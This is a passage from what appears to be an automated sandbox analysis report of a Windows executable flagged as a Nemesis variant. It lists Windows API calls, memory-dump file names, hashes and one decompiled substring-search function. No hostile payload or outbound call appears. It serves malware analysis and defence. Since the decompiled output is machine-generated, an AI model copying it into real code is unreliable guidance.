                                  0x00000000
                                  0x00000000
                                  0x00405e76
                                  0x00405e78
                                  0x00405e80

                                  APIs
                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003), ref: 00405E6E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-224404859
                                  • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                  • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                  • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                  • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                  				int _v8;
                                  				int _t12;
                                  				int _t14;
                                  				int _t15;
                                  				CHAR* _t17;
                                  				CHAR* _t27;
                                  
                                  				_t12 = lstrlenA(_a8);
                                  				_t27 = _a4;
                                  				_v8 = _t12;
                                  				while(lstrlenA(_t27) >= _v8) {
                                  					_t14 = _v8;
                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                  					_t15 = lstrcmpiA(_t27, _a8);
                                  					_t27[_v8] =  *(_t14 + _t27);
                                  					if(_t15 == 0) {
                                  						_t17 = _t27;
                                  					} else {
                                  						_t27 = CharNextA(_t27);
                                  						continue;
                                  					}
                                  					L5:
                                  					return _t17;
                                  				}
                                  				_t17 = 0;
                                  				goto L5;
                                  			}









                                  0x00405fa2
                                  0x00405fa4
                                  0x00405fa7
                                  0x00405fd3
                                  0x00405fac
                                  0x00405fb5
                                  0x00405fba
                                  0x00405fc5
                                  0x00405fc8
                                  0x00405fe4
                                  0x00405fca
                                  0x00405fd1
                                  0x00000000
                                  0x00405fd1
                                  0x00405fdd
                                  0x00405fe1
                                  0x00405fe1
                                  0x00405fdb
                                  0x00000000

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                  • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                  • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                  • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%